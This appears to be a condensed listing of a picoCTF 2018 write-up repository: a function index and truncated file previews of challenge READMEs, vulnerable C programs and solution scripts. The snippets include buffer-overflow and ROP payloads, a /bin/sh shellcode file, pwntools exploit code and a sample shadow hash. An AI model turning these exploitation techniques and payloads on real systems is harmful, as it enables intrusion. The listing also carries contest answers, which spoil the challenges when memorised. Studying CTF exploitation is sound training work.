function add_zeros (line 10) | def add_zeros(string, desired_length):
function decrypt_ciphertext (line 16) | def decrypt_ciphertext(cipherblock):
function encrypt_plaintext (line 69) | def encrypt_plaintext(plaintext):
FILE: Cryptography/SpyFi/files/spy_terminal_no_flag.py
function pad (line 6) | def pad(message):
function encrypt (line 11) | def encrypt(key, plain):
FILE: Cryptography/Super Safe RSA 2/solution/wienerAttack/Arithmetic.py
function egcd (line 7) | def egcd(a,b):
function gcd (line 21) | def gcd(a,b):
function modInverse (line 30) | def modInverse(e,n):
function totient (line 38) | def totient(p,q):
function bitlength (line 44) | def bitlength(x):
function isqrt (line 56) | def isqrt(n):
function is_perfect_square (line 75) | def is_perfect_square(n):
function test_is_perfect_square (line 99) | def test_is_perfect_square():
FILE: Cryptography/Super Safe RSA 2/solution/wienerAttack/ContinuedFractions.py
function rational_to_contfrac (line 8) | def rational_to_contfrac (x, y):
function convergents_from_contfrac (line 22) | def convergents_from_contfrac(frac):
function contfrac_to_rational (line 32) | def contfrac_to_rational (frac):
function test1 (line 47) | def test1():
FILE: Cryptography/Super Safe RSA 2/solution/wienerAttack/RSAwienerHacker.py
function hack_RSA (line 9) | def hack_RSA(e,n):
function test_hack_RSA (line 34) | def test_hack_RSA():
FILE: Cryptography/Super Safe RSA/solution/solve.py
function eea (line 11) | def eea(a,b):
function find_inverse (line 17) | def find_inverse(x,y):
FILE: General Skills/absolutely relative/files/absolutely-relative.c
function main (line 7) | int main()
FILE: General Skills/roulette/files/roulette.c
function is_digit (line 21) | int is_digit(char c) {
function get_long (line 25) | long get_long() {
function get_rand (line 45) | long get_rand() {
function get_bet (line 56) | long get_bet() {
function get_choice (line 69) | long get_choice() {
function print_flag (line 81) | int print_flag() {
function spin_roulette (line 123) | void spin_roulette(long spin) {
function play_roulette (line 163) | void play_roulette(long choice, long bet) {
function main (line 182) | int main(int argc, char *argv[]) {
FILE: General Skills/roulette/solution/generate.c
function main (line 5) | int main(int argc, char *argv[]) {
FILE: General Skills/script me/solution/solve.py
function solve (line 9) | def solve(problem):
function main (line 42) | def main():
FILE: General Skills/store/files/source.c
function main (line 3) | int main()
FILE: Reversing/assembly-2/solution/solve.c
function main (line 3) | int main() {
FILE: Reversing/assembly-3/solution/solve.c
function main (line 3) | int main() {
FILE: Reversing/be-quick-or-be-dead-2/solution/calculate.py
function fib (line 3) | def fib(n):
FILE: Reversing/be-quick-or-be-dead-3/solution/solve.py
function calc (line 1) | def calc(n):
FILE: Reversing/keygen-me-1/solution/test.c
function validate_key (line 18) | int validate_key(int keyArgs) {
FILE: Web Exploitation/A Simple Question/solution/solve.py
function brute (line 5) | def brute():
FILE: Web Exploitation/Inspect Me/solution/source/myjs.js
function openTab (line 1) | function openTab(tabName,elmnt,color) {
FILE: Web Exploitation/Secure Logon/files/server_noflag.py
function main (line 20) | def main():
function login (line 24) | def login():
function logout (line 44) | def logout():
function flag (line 50) | def flag():
class AESCipher (line 68) | class AESCipher:
method __init__ (line 76) | def __init__(self, key):
method encrypt (line 79) | def encrypt(self, raw):
method decrypt (line 85) | def decrypt(self, enc):
FILE: Web Exploitation/fancy-alive-monitoring/solution/solve.py
function exploit (line 10) | def exploit(whut, exploit):
Condensed preview — 276 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (342K chars).
[
{
"path": ".gitmodules",
"chars": 497,
"preview": "[submodule \"Binary Exploitation/can-you-gets-me/solution/ROPgadget\"]\n\tpath = Binary Exploitation/can-you-gets-me/solutio"
},
{
"path": "Binary Exploitation/are you root?/README.md",
"chars": 333,
"preview": "# are you root?\nPoints: 550\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you get root access through this [service"
},
{
"path": "Binary Exploitation/are you root?/files/auth.c",
"chars": 2900,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <string.h>\n\ntypedef enum auth_level {\n ANONYMOUS = "
},
{
"path": "Binary Exploitation/authenticate/README.md",
"chars": 2389,
"preview": "# authenticate\nPoints: 350\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you [authenticate](files/auth) to this ser"
},
{
"path": "Binary Exploitation/authenticate/files/auth.c",
"chars": 1156,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <string.h>\n#include <sys/types.h>\n\nint authenticated"
},
{
"path": "Binary Exploitation/authenticate/solution/solve.py",
"chars": 379,
"preview": "#!/usr/bin/python\nfrom pwn import *\nfrom time import sleep\nimport re\n\nauth_addr = p32(0x0804a04c)\nexploit = auth_addr +"
},
{
"path": "Binary Exploitation/buffer overflow 0/README.md",
"chars": 2129,
"preview": "# buffer overflow 0\nPoints: 150\n\n## Category\nBinary Exploitation\n\n## Question\n>Let's start off simple, can you overflow "
},
{
"path": "Binary Exploitation/buffer overflow 0/files/vuln.c",
"chars": 814,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <signal.h>\n\n#define FLAGSIZE_MAX 64\n\nchar flag[FLAGS"
},
{
"path": "Binary Exploitation/buffer overflow 0/solution/flag.txt",
"chars": 20,
"preview": "picoCTF{sample_flag}"
},
{
"path": "Binary Exploitation/buffer overflow 0/solution/solve.py",
"chars": 333,
"preview": "#!/usr/bin/python\nfrom pwn import *\n\nUSER = 'Platy' # Change username accordingly.\n\ns = ssh(host='2018shell1.picoctf.com"
},
{
"path": "Binary Exploitation/buffer overflow 1/README.md",
"chars": 4745,
"preview": "# buffer overflow 1\nPoints: 200\n\n## Category\nBinary Exploitation\n\n## Question\n>Okay now you're cooking! This time can yo"
},
{
"path": "Binary Exploitation/buffer overflow 1/files/flag.txt",
"chars": 36,
"preview": "picoCTF{addr3ss3s_ar3_3asy65489706}\n"
},
{
"path": "Binary Exploitation/buffer overflow 1/files/vuln.c",
"chars": 781,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n#include \"asm.h\"\n\n"
},
{
"path": "Binary Exploitation/buffer overflow 1/solution/flag.txt",
"chars": 21,
"preview": "picoCTF{sample_flag}\n"
},
{
"path": "Binary Exploitation/buffer overflow 1/solution/solve.py",
"chars": 505,
"preview": "#!/usr/bin/python\nfrom pwn import *\nimport os\n\nPATH = os.path.dirname(os.path.realpath(__file__))\n\nUSER = 'Platy' # Chan"
},
{
"path": "Binary Exploitation/buffer overflow 2/README.md",
"chars": 498,
"preview": "# buffer overflow 2\nPoints: 250\n\n## Category\nBinary Exploitation\n\n## Question\n>Alright, this time you'll need to control"
},
{
"path": "Binary Exploitation/buffer overflow 2/files/flag.txt",
"chars": 36,
"preview": "picoCTF{addr3ss3s_ar3_3asyada28e9b}\n"
},
{
"path": "Binary Exploitation/buffer overflow 2/files/vuln.c",
"chars": 793,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n\n#define BUFSIZE 1"
},
{
"path": "Binary Exploitation/buffer overflow 2/solution/solve.py",
"chars": 402,
"preview": "#!/usr/bin/python\n\nfrom pwn import *\n\nvuln = ELF('./vuln')\npadding = 'A' * 112\npayload = p32(vuln.symbols['win'])\n\nexplo"
},
{
"path": "Binary Exploitation/buffer overflow 3/README.md",
"chars": 465,
"preview": "# buffer overflow 3\nPoints: 450\n\n## Category\nBinary Exploitation\n\n## Question\n>It looks like Dr. Xernon added a stack ca"
},
{
"path": "Binary Exploitation/buffer overflow 3/files/vuln.c",
"chars": 1716,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n#include <wchar.h>"
},
{
"path": "Binary Exploitation/can-you-gets-me/README.md",
"chars": 699,
"preview": "# can-you-gets-me\nPoints: 650\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you exploit the following [program](fil"
},
{
"path": "Binary Exploitation/can-you-gets-me/files/gets.c",
"chars": 447,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n\n#define BUFSIZE 1"
},
{
"path": "Binary Exploitation/can-you-gets-me/solution/solve.py",
"chars": 2065,
"preview": "#!/usr/bin/python\nfrom pwn import *\n\nUSER = 'Platy' # Change username accordingly.\n\npadding = 'A' * 28\n# execve generate"
},
{
"path": "Binary Exploitation/echo back/README.md",
"chars": 425,
"preview": "# echo back\nPoints: 500\n\n## Category\nBinary Exploitation\n\n## Question\nThis [program](files/echoback) we found seems to h"
},
{
"path": "Binary Exploitation/echo back/solution/solve.py",
"chars": 324,
"preview": "#!/usr/bin/python\nfrom pwn import *\n\ncontext.log_level = 'error'\n\nechoback = ELF('./echoback')\n\nputs_got_addr = echoback"
},
{
"path": "Binary Exploitation/echooo/README.md",
"chars": 1361,
"preview": "# echooo \nPoints: 300\n\n## Category\nBinary Exploitation\n\n## Question\n>This program prints any input you give it. Can you "
},
{
"path": "Binary Exploitation/echooo/files/echo.c",
"chars": 911,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n\nint main(int argc"
},
{
"path": "Binary Exploitation/echooo/solution/solve.py",
"chars": 646,
"preview": "#!/usr/bin/python\nfrom pwn import *\nimport re\n\nencFlag = ''\ns = remote('2018shell1.picoctf.com', 46960)\nstage1 = ' '.joi"
},
{
"path": "Binary Exploitation/got-2-learn-libc/README.md",
"chars": 621,
"preview": "# got-2-learn-libc\nPoints: 250\n\n## Category\nBinary Exploitation\n\n## Question\n>This program gives you the address of some"
},
{
"path": "Binary Exploitation/got-2-learn-libc/files/vuln.c",
"chars": 843,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n\n#define BUFSIZE 1"
},
{
"path": "Binary Exploitation/got-2-learn-libc/solution/solve.py",
"chars": 1390,
"preview": "#!/usr/bin/python\nfrom pwn import *\nimport os.path\n\nUSER = 'Platy' # Change username accordingly.\n\ns = ssh(host='2018she"
},
{
"path": "Binary Exploitation/got-shell?/README.md",
"chars": 453,
"preview": "# got-shell?\nPoints: 350\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you authenticate to this [service](files/aut"
},
{
"path": "Binary Exploitation/got-shell?/files/auth.c",
"chars": 697,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <string.h>\n#include <sys/types.h>\n\nvoid win() {\n sy"
},
{
"path": "Binary Exploitation/got-shell?/solution/solve.py",
"chars": 429,
"preview": "#!/usr/bin/python\nfrom pwn import *\nfrom time import sleep\n\nauth = ELF('./auth')\ngot = str(hex(auth.got['exit']))\nwin_fu"
},
{
"path": "Binary Exploitation/gps/README.md",
"chars": 385,
"preview": "# gps\nPoints: 550\n\n## Category\nBinary Exploitation\n\n## Question\n>You got really lost in the wilderness, with nothing but"
},
{
"path": "Binary Exploitation/gps/files/gps.c",
"chars": 1370,
"preview": "#include <stdint.h>\n#include <stdlib.h>\n#include <stdio.h>\n#include <unistd.h>\n\n#define GPS_ACCURACY 1337\n\ntypedef void "
},
{
"path": "Binary Exploitation/leak-me/README.md",
"chars": 1189,
"preview": "# leak-me\nPoints: 200\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you authenticate to this [service](files/auth) "
},
{
"path": "Binary Exploitation/leak-me/files/auth.c",
"chars": 1551,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n\nint flag() {\n ch"
},
{
"path": "Binary Exploitation/leak-me/solution/solve.py",
"chars": 373,
"preview": "from pwn import *\nimport re\nimport time\n\ns = remote('2018shell1.picoctf.com', 31045)\nprint s.recv()\ns.sendline('A' * 500"
},
{
"path": "Binary Exploitation/rop chain/README.md",
"chars": 2130,
"preview": "# rop chain\nPoints: 350\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you exploit the following [program](files/rop"
},
{
"path": "Binary Exploitation/rop chain/files/exp",
"chars": 44,
"preview": "AAAAAAAAAAAAAAAAAAAAAAAAAAAA˅\u0004\b\u0004\b\u0006\u0004\b+\u0004\b\u0006\u0004\b\n"
},
{
"path": "Binary Exploitation/rop chain/files/flag.txt",
"chars": 8,
"preview": "DID IT!\n"
},
{
"path": "Binary Exploitation/rop chain/files/rop.c",
"chars": 1470,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n#include <stdbool."
},
{
"path": "Binary Exploitation/rop chain/solution/solve.py",
"chars": 621,
"preview": "#!/usr/bin/python\nfrom pwn import *\n\nUSER = 'Platy' # Change username accordingly.\n\npadding = 'A' * 28\n\nwin1_addr = p32("
},
{
"path": "Binary Exploitation/shellcode/README.md",
"chars": 481,
"preview": "# shellcode\nPoints: 200\n\n## Category\nBinary Exploitation\n\n## Question\n>This [program](files/vuln) executes any input you"
},
{
"path": "Binary Exploitation/shellcode/files/exploit",
"chars": 20,
"preview": "1Ph//shh/bin°\u000b̀1@̀,\n"
},
{
"path": "Binary Exploitation/shellcode/files/vuln.c",
"chars": 562,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n\n#define BUFSIZE 1"
},
{
"path": "Binary Exploitation/shellcode/solution/solve.py",
"chars": 424,
"preview": "#!/usr/bin/python\n\nfrom pwn import *\n\nPADDING = 164\n\npayload = asm(shellcraft.sh())\nnopsled = '\\x90' * (PADDING - len(pa"
},
{
"path": "Cryptography/Crypto Warmup 1/README.md",
"chars": 714,
"preview": "# Crypto Warmup 1\nPoints: 75\n\n## Category\nCryptography\n\n## Question\n>Crpyto can often be done by hand, here's a message "
},
{
"path": "Cryptography/Crypto Warmup 1/files/table.txt",
"chars": 1571,
"preview": " A B C D E F G H I J K L M N O P Q R S T U V W X Y Z \n +----------------------------------------------------\nA | A "
},
{
"path": "Cryptography/Crypto Warmup 2/README.md",
"chars": 458,
"preview": "# Crypto Warmup 2\nPoints: 75\n\n## Category\nCryptography\n\n## Question\n>Cryptography doesn't have to be complicated, have y"
},
{
"path": "Cryptography/HEEEEEEERE'S Johnny!/README.md",
"chars": 873,
"preview": "# HEEEEEEERE'S Johnny!\nPoints: 100\n\n## Category\nCryptography\n\n## Question\n>Okay, so we found some important looking file"
},
{
"path": "Cryptography/HEEEEEEERE'S Johnny!/files/passwd",
"chars": 31,
"preview": "root:x:0:0:root:/root:/bin/bash"
},
{
"path": "Cryptography/HEEEEEEERE'S Johnny!/files/shadow",
"chars": 123,
"preview": "root:$6$LcvKHioa$67O1HA8Ti.KHeNbD4rE79ZMl1RbiCw4V7eM.r6AURp2wGnapUpXC.VdVB4WGoS2J5eVKP/1MFeMmXIdveJeOS0:17695:0:99999:7:"
},
{
"path": "Cryptography/James Brahm Returns/README.md",
"chars": 381,
"preview": "# James Brahm Returns\nPoints: 700\n\n## Category\nCryptography\n\n## Question\n>Dr. Xernon has finally approved an update to J"
},
{
"path": "Cryptography/James Brahm Returns/files/source.py",
"chars": 2570,
"preview": "#!/usr/bin/python2 -u\nfrom Crypto.Cipher import AES\nimport reuse\nimport random\nfrom string import digits\nimport hashlib\n"
},
{
"path": "Cryptography/Magic Padding Oracle/README.md",
"chars": 2933,
"preview": "# Magic Padding Oracle\nPoints: 450\n\n## Category\nCryptography\n\n## Question\n>Can you help us retreive the flag from this c"
},
{
"path": "Cryptography/Magic Padding Oracle/files/pkcs7.py",
"chars": 1522,
"preview": "#!/usr/bin/python2\nimport os\nimport json\nimport sys\nimport time\n\nfrom Crypto.Cipher import AES\n\ncookiefile = open(\"cooki"
},
{
"path": "Cryptography/Magic Padding Oracle/solution/requirements.txt",
"chars": 5,
"preview": "nclib"
},
{
"path": "Cryptography/Magic Padding Oracle/solution/solution.py",
"chars": 4938,
"preview": "import nclib, sys, binascii\n\n# Generate all 256 binary combinations of 1 byte\nbyte_combinations = []\nfor i in range(0, 2"
},
{
"path": "Cryptography/Safe RSA/README.md",
"chars": 783,
"preview": "# Safe RSA\nPoints: 250\n\n## Category\nCryptography\n\n## Question\n>Now that you know about RSA can you help us decrypt this "
},
{
"path": "Cryptography/Safe RSA/files/ciphertext",
"chars": 882,
"preview": "\nN: 37415923547017213098893819652088052694795252162093236205030866324359578830858399212088135936525894972381991175819801"
},
{
"path": "Cryptography/Safe RSA/solution/solve.py",
"chars": 369,
"preview": "#!/usr/bin/python\n\nfrom gmpy2 import *\n\nget_context().precision=500\n\nc = mpq(2205316413931134031046440767620541984801091"
},
{
"path": "Cryptography/SpyFi/README.md",
"chars": 402,
"preview": "# SpyFi\nPoints: 300\n\n## Category\nCryptography\n\n## Question\n>James Brahm, James Bond's less-franchised cousin, has left h"
},
{
"path": "Cryptography/SpyFi/files/spy_terminal_no_flag.py",
"chars": 663,
"preview": "#!/usr/bin/python2 -u\nfrom Crypto.Cipher import AES\n\nagent_code = \"\"\"flag\"\"\"\n\ndef pad(message):\n if len(message) % 16"
},
{
"path": "Cryptography/Super Safe RSA/README.md",
"chars": 688,
"preview": "# Super Safe RSA\nPoints: 350\n\n## Category\nCryptography\n\n## Question\n>Dr. Xernon made the mistake of rolling his own cryp"
},
{
"path": "Cryptography/Super Safe RSA/solution/ciphertext",
"chars": 176,
"preview": "c: 7929011382767041584510203527859505899601572024468762886720475415218105799874362\nn: 1193019151742042442845886277184626"
},
{
"path": "Cryptography/Super Safe RSA/solution/solve.py",
"chars": 630,
"preview": "#!/usr/bin/python\nfrom gmpy2 import *\n\nc = 79290113827670415845102035278595058996015720244687628867204754152181057998743"
},
{
"path": "Cryptography/Super Safe RSA 2/README.md",
"chars": 361,
"preview": "# Super Safe RSA 2\nPoints: 425\n\n## Category\nCryptography\n\n## Question\n>Wow, he made the exponent really large so the enc"
},
{
"path": "Cryptography/Super Safe RSA 2/solution/ciphertext",
"chars": 937,
"preview": "c: 879737143579817111925521228449319942019289296295235234026984492293493184963258386310699924083585386094567074872929324"
},
{
"path": "Cryptography/Super Safe RSA 2/solution/solve.py",
"chars": 1089,
"preview": "#!/usr/bin/python\nfrom gmpy2 import *\nfrom wienerAttack.RSAwienerHacker import *\n\nN = 1230114197272429296058594843797127"
},
{
"path": "Cryptography/Super Safe RSA 2/solution/wienerAttack/Arithmetic.py",
"chars": 2196,
"preview": "'''\nCreated on Dec 22, 2011\n\n@author: pablocelayes\n'''\n\ndef egcd(a,b):\n '''\n Extended Euclidean Algorithm\n retu"
},
{
"path": "Cryptography/Super Safe RSA 2/solution/wienerAttack/ContinuedFractions.py",
"chars": 1766,
"preview": "'''\nCreated on Dec 14, 2011\n\n@author: pablocelayes\n \n'''\n\ndef rational_to_contfrac (x, y):\n ''' \n Converts a ra"
},
{
"path": "Cryptography/Super Safe RSA 2/solution/wienerAttack/RSAwienerHacker.py",
"chars": 1505,
"preview": "'''\nCreated on Dec 14, 2011\n\n@author: pablocelayes\n'''\n\nimport ContinuedFractions, Arithmetic, RSAvulnerableKeyGenerator"
},
{
"path": "Cryptography/Super Safe RSA 2/solution/wienerAttack/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "Cryptography/Super Safe RSA 3/README.md",
"chars": 605,
"preview": "# Super Safe RSA 3 \nPoints: 600\n\n## Category\nCryptography\n\n## Question\n>The more primes, the safer.. right.?.? Connect w"
},
{
"path": "Cryptography/Super Safe RSA 3/solution/ciphertext",
"chars": 627,
"preview": "c: 382677175217838053589970284341925740720662067341500588067020392415405455913271608171381033087788062605506912782290334"
},
{
"path": "Cryptography/Super Safe RSA 3/solution/solve.py",
"chars": 1299,
"preview": "#!/usr/bin/python\nfrom gmpy2 import *\n\nn = 40795360971651974271650711440993964050307855147720011233981545415438122680764"
},
{
"path": "Cryptography/blaise's cipher/README.md",
"chars": 572,
"preview": "# blaise's cipher\nPoints: 200\n\n## Category\nCryptography\n\n## Question\n>My buddy Blaise told me he learned about this cool"
},
{
"path": "Cryptography/blaise's cipher/solution/ciphertext",
"chars": 3522,
"preview": "Encrypted message:\nYse lncsz bplr-izcarpnzjo dkxnroueius zf g uzlefwpnfmeznn cousex bls ltcmaqltki my Rjzn Hfetoxea Gqme"
},
{
"path": "Cryptography/caesar cipher 1/README.md",
"chars": 564,
"preview": "# caesar cipher 1\nPoints: 150\n\n## Category\nCryptography\n\n## Question\n>This is one of the older ciphers in the books, can"
},
{
"path": "Cryptography/caesar cipher 1/files/ciphertext",
"chars": 41,
"preview": "picoCTF{domnuaiixifxwuymulwcjbylnivlpglc}"
},
{
"path": "Cryptography/caesar cipher 2/README.md",
"chars": 519,
"preview": "# caesar cipher 2\nPoints: 250\n\n## Category\nCryptography\n\n## Question\n>Can you help us decrypt this [message](files/)? We"
},
{
"path": "Cryptography/caesar cipher 2/files/ciphertext",
"chars": 41,
"preview": "4-'3evh?'c)7%t#e-r,g6u#.9uv#%tg2v#7g'w6gA"
},
{
"path": "Cryptography/hertz/README.md",
"chars": 431,
"preview": "# hertz\nPoints: 150\n\n## Category\nCryptography\n\n## Question\n>Here's another simple cipher for you where we made a bunch o"
},
{
"path": "Cryptography/hertz/solution/ciphertext",
"chars": 2990,
"preview": "-------------------------------------------------------------------------------\nuqblrjwm zxrx gm fqvr pojl - mvtmwgwvwgq"
},
{
"path": "Cryptography/hertz 2/README.md",
"chars": 499,
"preview": "# hertz 2\nPoints: 200\n\n## Category\nCryptography\n\n## Question\n>This flag has been encrypted with some kind of cipher, can"
},
{
"path": "Cryptography/hertz 2/solution/ciphertext",
"chars": 251,
"preview": "Let's decode this now!\nXcd fiejb phgor kgw qivsm gudh xcd ynza lgt. E jnr'x pdyedud xcem em mijc nr dnma shgpydv er Sejg"
},
{
"path": "Cryptography/rsa-madlibs/README.md",
"chars": 434,
"preview": "# rsa-madlibs\nPoints: 250\n\n## Category\nCryptography\n\n## Question\n>We ran into some weird puzzles we think may mean somet"
},
{
"path": "Cryptography/rsa-madlibs/solution/solve.py",
"chars": 1825,
"preview": "from pwn import *\n\ns = remote('2018shell1.picoctf.com', 40440)\ns.sendline('Y\\n8815769761')\nprint s.recv()\ns.sendline('Y\\"
},
{
"path": "Forensics/Desrouleaux/README.md",
"chars": 499,
"preview": "# Desrouleaux\nPoints: 150\n\n## Category\nForensics\n\n## Question\n>Our network administrator is having some trouble handling"
},
{
"path": "Forensics/Desrouleaux/files/incidents.json",
"chars": 2219,
"preview": "{\n \"tickets\": [\n {\n \"ticket_id\": 0,\n \"timestamp\": \"2017/03/28 10:01:06\",\n \"fi"
},
{
"path": "Forensics/Ext Super Magic/README.md",
"chars": 1067,
"preview": "# Ext Super Magic\nPoints: 250\n\n## Category\nForensics\n\n## Question\n>We salvaged a ruined Ext SuperMagic II-class mech rec"
},
{
"path": "Forensics/Forensics Warmup 1/README.md",
"chars": 401,
"preview": "# Forensics Warmup 1\nPoints: 50\n\n## Category\nForensics\n\n## Question\n>Can you unzip this [file](files/flag.zip) for me an"
},
{
"path": "Forensics/Forensics Warmup 2/README.md",
"chars": 542,
"preview": "# Forensics Warmup 2\nPoints: 50\n\n## Category\nForensics\n\n## Question\n>Hmm for some reason I can't open this [PNG](files/f"
},
{
"path": "Forensics/LoadSomeBits/README.md",
"chars": 532,
"preview": "# LoadSomeBits\nPoints: 550\n\n## Category\nForensics\n\n## Question\n>Can you find the flag encoded inside this [image](files/"
},
{
"path": "Forensics/Lying Out/README.md",
"chars": 309,
"preview": "# Lying Out\nPoints: 250\n\n## Category\nForensics\n\n## Question\n>Some odd [traffic](files/traffic.png) has been detected on "
},
{
"path": "Forensics/Malware Shops/README.md",
"chars": 296,
"preview": "# Malware Shops\nPoints: 400\n\n## Category\nForensics\n\n## Question\n>There has been some [malware](files/plot.png) detected,"
},
{
"path": "Forensics/Malware Shops/files/info.txt",
"chars": 1705,
"preview": "You've been given a dataset of about 500 malware binary files that have\nbeen found on your organization's computers. Whe"
},
{
"path": "Forensics/Reading Between the Eyes/README.md",
"chars": 1055,
"preview": "# Reading Between the Eyes\nPoints: 150\n\n## Category\nForensics\n\n## Question\n>Stego-Saurus hid a message for you in this i"
},
{
"path": "Forensics/Recovering From the Snap/README.md",
"chars": 552,
"preview": "# Recovering From the Snap\nPoints: 150\n\n## Category\nForensics\n\n## Question\n>There used to be a bunch of [animals](files/"
},
{
"path": "Forensics/Truly an Artist/README.md",
"chars": 330,
"preview": "# Truly an Artist\nPoints: 200\n\n## Category\nForensics\n\n## Question\n>Can you help us find the flag in this [Meta-Material]"
},
{
"path": "Forensics/What's My Name?/README.md",
"chars": 247,
"preview": "# What's My Name?\nPoints: 250\n\n## Category\nForensics\n\n## Question\n>Say my name, say [my name](files/myname.pcap). \n\n### "
},
{
"path": "Forensics/admin panel/README.md",
"chars": 918,
"preview": "# admin panel\nPoints: 150\n\n## Category\nForensics\n\n## Question\n>We captured some [traffic](files/admin_panel.pcap) loggin"
},
{
"path": "Forensics/core/README.md",
"chars": 713,
"preview": "# core\nPoints: 350\n\n## Category\nForensics\n\n## Question\n>This [program](files/print) was about to print the flag when it "
},
{
"path": "Forensics/hex editor/README.md",
"chars": 507,
"preview": "# hex editor\nPoints: 150\n\n## Category\nForensics\n\n## Question\n>This [cat](files/hex_editor.jpg) has a secret to teach you"
},
{
"path": "Forensics/now you don't/README.md",
"chars": 514,
"preview": "# now you don't\nPoints: 200\n\n## Category\nForensics\n\n## Question\n>We heard that there is something hidden in this [pictur"
},
{
"path": "General Skills/Aca-Shell-A/README.md",
"chars": 3758,
"preview": "# Aca-Shell-A\nPoints: 150\n\n## Category\nGeneral Skills\n\n## Question\n>It's never a bad idea to brush up on those linux ski"
},
{
"path": "General Skills/Dog or Frog/README.md",
"chars": 355,
"preview": "# Dog or Frog\nPoints: 400\n\n## Category\nGeneral Skills\n\n## Question\n>Dressing up dogs are kinda the new thing, see if you"
},
{
"path": "General Skills/General Warmup 1/README.md",
"chars": 422,
"preview": "# General Warmup 1\nPoints: 50 \n\n## Category\nGeneral Skills\n\n## Question\n>If I told you your grade was 0x41 in hexadecima"
},
{
"path": "General Skills/General Warmup 2/README.md",
"chars": 423,
"preview": "# General Warmup 2\nPoints: 50\n\n## Category\nGeneral Skills\n\n## Question\n>Can you convert the number 27 (base 10) to binar"
},
{
"path": "General Skills/General Warmup 3/README.md",
"chars": 388,
"preview": "# General Warmup 3\nPoints: 50\n\n## Category\nGeneral Skills\n\n## Question\n>What is 0x3D (base 16) in decimal (base 10). \n\n#"
},
{
"path": "General Skills/Resources/README.md",
"chars": 393,
"preview": "# Resources\nPoints: 50\n\n## Category\nGeneral Skills\n\n## Question\n>We put together a bunch of resources to help you out on"
},
{
"path": "General Skills/Resources/solution/source/resources",
"chars": 8808,
"preview": "<!DOCTYPE HTML>\n<html lang=\"en\">\n\n<head>\n <meta charset=\"utf-8\">\n <meta name=\"viewport\" content=\"width=device-widt"
},
{
"path": "General Skills/absolutely relative/README.md",
"chars": 1145,
"preview": "# absolutely relative\nPoints: 250\n\n## Category\nGeneral Skills\n\n## Question\n>In a filesystem, everything is relative ¯\\\\\\"
},
{
"path": "General Skills/absolutely relative/files/absolutely-relative.c",
"chars": 796,
"preview": "#include <stdio.h>\n#include <string.h>\n\n#define yes_len 3\nconst char *yes = \"yes\";\n\nint main()\n{\n char flag[99];\n "
},
{
"path": "General Skills/absolutely relative/files/permission.txt",
"chars": 4,
"preview": "yes\n"
},
{
"path": "General Skills/environ/README.md",
"chars": 643,
"preview": "# environ\nPoints: 150\n\n## Category\nGeneral Skills\n\n## Question\n>Sometimes you have to configure environment variables be"
},
{
"path": "General Skills/grep 1/README.md",
"chars": 581,
"preview": "# grep 1\nPoints: 75\n\n## Category\nGeneral Skills\n\n## Question\n>Can you find the flag in [file](files/file)? This would be"
},
{
"path": "General Skills/grep 1/files/file",
"chars": 16046,
"preview": "c|=6.<Lj.wi~ZRBuEc\tsH_!G /$^VT4TU@jW+i4ZW$ZH>3gh8|R!C3d9t#/rtuso-d03`7,LDyi$i|H1 SBvWY_jZTWH)kd,nM42-x3*G_r08IIi[wNHe*>"
},
{
"path": "General Skills/grep 2/README.md",
"chars": 572,
"preview": "# grep 2\nPoints: 125\n\n## Category\nGeneral Skills\n\n## Question\n>This one is a little bit harder. Can you find the flag in"
},
{
"path": "General Skills/in out error/README.md",
"chars": 2566,
"preview": "# in out error\nPoints: 275\n\n## Category\nGeneral Skills\n\n## Question\n>Can you utlize stdin, stdout, and stderr to get the"
},
{
"path": "General Skills/learn gdb/README.md",
"chars": 1573,
"preview": "# learn gdb\nPoints: 300\n\n## Category\nGeneral Skills\n\n## Question\n>Using a debugging tool will be extremely useful on you"
},
{
"path": "General Skills/net cat/README.md",
"chars": 487,
"preview": "# net cat\nPoints: 75\n\n## Category\nGeneral Skills\n\n## Question\n>Using netcat (nc) will be a necessity throughout your adv"
},
{
"path": "General Skills/pipe/README.md",
"chars": 733,
"preview": "# pipe\nPoints: 110\n\n## Category\nGeneral Skills\n\n## Question\n>During your adventure, you will likely encounter a situatio"
},
{
"path": "General Skills/roulette/README.md",
"chars": 403,
"preview": "# roulette\nPoints: 350\n\n## Category\nGeneral Skills\n\n## Question\n>This Online [Roulette](files/roulette) Service is in Be"
},
{
"path": "General Skills/roulette/files/roulette.c",
"chars": 4653,
"preview": "#include <stdio.h>\n#include <stdint.h>\n#include <stdlib.h>\n#include <time.h>\n#include <unistd.h>\n#include <limits.h>\n\n#d"
},
{
"path": "General Skills/roulette/solution/Makefile",
"chars": 53,
"preview": "all:\n\tgcc generate.c -o generate\nclean:\n\trm generate\n"
},
{
"path": "General Skills/roulette/solution/generate.c",
"chars": 308,
"preview": "// C program to generate random numbers \n#include <stdio.h>\n#include <stdlib.h>\n\nint main(int argc, char *argv[]) {\n\tif "
},
{
"path": "General Skills/roulette/solution/solve.py",
